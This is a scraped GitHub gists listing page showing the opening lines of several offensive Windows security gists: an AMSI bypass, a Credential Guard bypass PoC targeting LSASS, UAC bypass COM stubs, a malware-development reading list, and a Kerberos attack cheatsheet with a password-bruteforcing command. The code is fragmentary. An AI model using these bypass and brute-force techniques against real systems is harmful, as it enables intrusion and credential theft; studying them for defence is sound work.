Skip to content

Instantly share code, notes, and snippets.

View Yeah9782's full-sized avatar

Yeah9782 Yeah9782

18 followers · 123 following
View GitHub Profile
@0prrr
0prrr / All-Mal-Dev.md
Last active October 16, 2025 04:37
Malware Dev Reading List
@odzhan
odzhan / BaseThreadInitThunk.cpp
Last active October 14, 2025 12:19
Locating kernel32!BaseThreadInitThunk in NTDLL
//
// Every new thread starts with ntdll!RtlUserThreadStart and it typically calls kernel32!BaseThreadInitThunk
//
// Some applications like Mozilla Firefox and Microsoft Edge will replace this with their own function for hooking purposes.
// The following code shows how to find it without using debugging symbols.
//
// @modexpblog
//
#define PHNT_VERSION PHNT_VISTA
@CCob
CCob / patchless_amsi.h
Created April 17, 2022 16:18
In-Process Patchless AMSI Bypass
#ifndef PATCHLESS_AMSI_H
#define PATCHLESS_AMSI_H
#include <windows.h>
static const int AMSI_RESULT_CLEAN = 0;
PVOID g_amsiScanBufferPtr = nullptr;
unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) {
@N4kedTurtle
N4kedTurtle / CredGuard_PoC
Created August 25, 2020 14:17
PoC for enabling wdigest to bypass credential guard
#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <iostream>
DWORD GetLsassPid() {
PROCESSENTRY32 entry;
entry.dwSize = sizeof(PROCESSENTRY32);
@alexx384
alexx384 / memmem.md
Last active June 12, 2022 23:45
Custom implementation of memmem() for Windows and others

The implementation based on the StackExchange question and answers. Also added some improvements.

#include <stdlib.h>

void* memmem(const void* haystack, size_t haystackLen,
             const void* needle, size_t needleLen)
{
	/* The first occurrence of the empty string is deemed to occur at
@hfiref0x
hfiref0x / akagi_58a.c
Created October 23, 2019 16:27
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@xpn
xpn / clr_via_native.c
Created April 11, 2018 21:34
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@hfiref0x
hfiref0x / akagi_42b.c
Last active August 21, 2025 16:06
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@hfiref0x
hfiref0x / akagi_41.c
Created August 16, 2017 03:31
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);